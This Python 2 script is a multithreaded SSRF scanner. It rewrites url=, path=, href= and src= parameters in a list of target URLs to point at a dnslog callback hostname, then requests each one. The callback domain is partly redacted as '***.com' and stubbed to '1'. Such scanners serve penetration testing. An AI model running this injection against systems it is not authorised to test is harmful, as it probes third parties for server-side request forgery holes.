# SSRF for DNSLOG
#encoding=gbk
import urllib2
import threading
import Queue
import json
import sys
import os
import re
# Serializes console output from the worker threads.
lock = threading.Lock()
# Default request headers sent with every probe (browser-like UA, no caching).
header = {"Content-type": "application/x-www-form-urlencoded",
          'Accept-Language': 'zh-CN,zh;q=0.8',
          'User-Agent': "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Cookie": "None",
          "Connection": "close",
          "Cache-Control": "no-cache"}
# URLs that answered HTTP 403; appended by workers, written out by save403Url().
list403 = list()
def scan_http_service(mqueue, n):
    """Worker: drain URLs from *mqueue* and request each one.

    HTTP errors are reported; 403 responses are collected into the shared
    ``list403`` for later saving. Thread *n* is only used for log output.

    :param mqueue: Queue.Queue of URL strings to probe.
    :param n: integer id of this worker thread (logging only).
    """
    while True:
        if mqueue.empty():
            break
        # fix: str.strip() returns a new string; the original discarded the result
        url = str(mqueue.get()).strip()
        try:
            with lock:
                print("thread {} request for : {}".format(n, url))
            req = urllib2.Request(url, headers=header)
            response = urllib2.urlopen(req)
        except urllib2.HTTPError as e:
            with lock:
                print("{} Exception : {}".format(e.code, url))
            if e.code == 403:
                # list.append is atomic under the GIL, safe across workers
                list403.append(url)
        except urllib2.URLError as e:
            with lock:
                print(e.reason)
        else:
            # fix: the response was never closed -> leaked sockets
            response.close()
def readFile(filePath):
    """Read URLs, one per line, from *filePath*.

    :param filePath: path to a text file of URLs.
    :return: list of lines with trailing newlines stripped.
    Exits the process if the file does not exist.
    """
    if not os.path.exists(filePath):
        print("{} does not exist!".format(filePath))
        # fix: bare exit() relies on the site module; sys.exit is the proper call
        sys.exit()
    with open(filePath, 'r') as f:
        listUrl = [line.strip('\n') for line in f]
    print("get {} url in : {}".format(len(listUrl), filePath))
    return listUrl
def delUrlForDnslog(url):
    """Normalize *url* into a token safe to embed as a DNS label.

    Drops the query string and scheme, maps path separators and dots to
    '_', and deletes other special characters.

    :param url: full URL string.
    :return: sanitized identifier string.
    """
    url = url.split('?')[0]
    # fix: guard against schemeless input (original raised IndexError)
    if '://' in url:
        url = url.split('://')[1]
    # one pass each instead of 12 chained .replace() calls
    url = re.sub(r'[/\\.]', '_', url)        # separators become '_'
    url = re.sub(r'[#!,%:$@()*]', '', url)   # other specials are deleted
    return url
def getMarkFromUrl(url):
    """Build the dnslog marker hostname that identifies *url*.

    NOTE(review): the computed marker is immediately overwritten with the
    placeholder "1" — the real dnslog domain appears to have been redacted
    ("***.com"). Restore the real domain and remove the stub line before use.
    """
    dnsLogUrl = delUrlForDnslog(url)
    # DNS labels are length-limited, so cap the encoded URL at 100 chars
    if len(dnsLogUrl) > 100:
        dnsLogUrl = dnsLogUrl[0:100]
    dnsLogUrlMark = 'http://174.SSRF_'+ dnsLogUrl + ".3306.7049.vpst.***.com"
    # acture dnslog
    dnsLogUrlMark = "1"
    return dnsLogUrlMark
def findRegAndReplace(pattern, original_url, dnsLogUrl):
    """Replace the first value captured by *pattern* with *dnsLogUrl*.

    :param pattern: regex with one capture group (a parameter value).
    :param original_url: URL to rewrite.
    :param dnsLogUrl: replacement marker.
    :return: rewritten URL, or *original_url* when the pattern does not
        match or the captured value spans another parameter ('&').
    """
    # fix: the original stringified findall() and sliced [2:-2], which
    # corrupts values containing quotes or multiple matches; take the
    # first match's group directly.
    match = re.search(pattern, original_url)
    if match:
        reg_url = match.group(1)
        if len(reg_url) and '&' not in reg_url:
            return original_url.replace(reg_url, dnsLogUrl)
    return original_url
def replaceWithDnsLog(original_url, dnsLogUrl):
    """Rewrite SSRF-prone parameters (url=/path=/href=/src=) to *dnsLogUrl*.

    Each pattern is tried both mid-query (terminated by '&') and at
    end-of-string, in the same order as the original implementation.

    :return: rewritten URL, or *original_url* unchanged on any failure.
    """
    patterns = (
        r'url=(.+?)&',
        r'path=(.+?)&',
        r'url=(.+?)$',
        r'path=(.+?)$',
        r'href=(.+?)&',
        r'href=(.+?)$',
        r'src=(.+?)&',
        r'src=(.+?)$',
    )
    url = original_url
    try:
        for pattern in patterns:
            url = findRegAndReplace(pattern, url, dnsLogUrl)
    # fix: bare except also swallowed SystemExit/KeyboardInterrupt
    except Exception:
        url = original_url
    return url
def delUrl(urlList):
    """Return the URLs from *urlList* whose parameters could be rewritten
    with a dnslog marker; URLs left unchanged are dropped."""
    finalUrlList = list()
    for item in urlList:
        original_url = str(item)
        mark = getMarkFromUrl(original_url)
        rewritten = replaceWithDnsLog(original_url, mark)
        if rewritten != original_url:
            finalUrlList.append(rewritten)
    print("DnsLogMark for {} URl".format(len(finalUrlList)))
    return finalUrlList
def save403Url():
    """Write the collected 403-responding URLs to a fresh file in urlDir/.

    Picks the first non-existing name in the series 403ExceptionUrl.txt,
    403ExceptionUrl_0.txt, 403ExceptionUrl_1.txt, ...
    """
    # fix: hard-coded "\\" separators were Windows-only; use os.path.join
    dirPath = os.path.join(sys.path[0], "urlDir")
    filePath = os.path.join(dirPath, "403ExceptionUrl.txt")
    i = 0
    while os.path.exists(filePath):
        filePath = os.path.join(dirPath, "403ExceptionUrl_{}.txt".format(i))
        i = i + 1
    with open(filePath, 'w') as f:
        for line in list403:
            # fix: writelines(line) wrote the URLs with no separator
            f.write(line + '\n')
    print("403 Exception Url save at :{}".format(filePath))
def main():
    """Entry point: load urlDir/url.txt, mark each URL with a dnslog
    payload, then probe every marked URL on its own worker thread."""
    print("start run!")
    # fix: hard-coded "\\" separators were Windows-only; use os.path.join
    filePath = os.path.join(sys.path[0], 'urlDir', 'url.txt')
    urlList = readFile(filePath)
    urlList = delUrl(urlList)
    threads = []
    myQueue = Queue.Queue()
    # one worker per URL, matching the original fan-out
    for n, url in enumerate(urlList):
        myQueue.put_nowait(url)
        t = threading.Thread(target=scan_http_service, args=(myQueue, n))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
    # save403Url()
# Run the scanner only when executed as a script (not on import).
if __name__ == '__main__':
    main()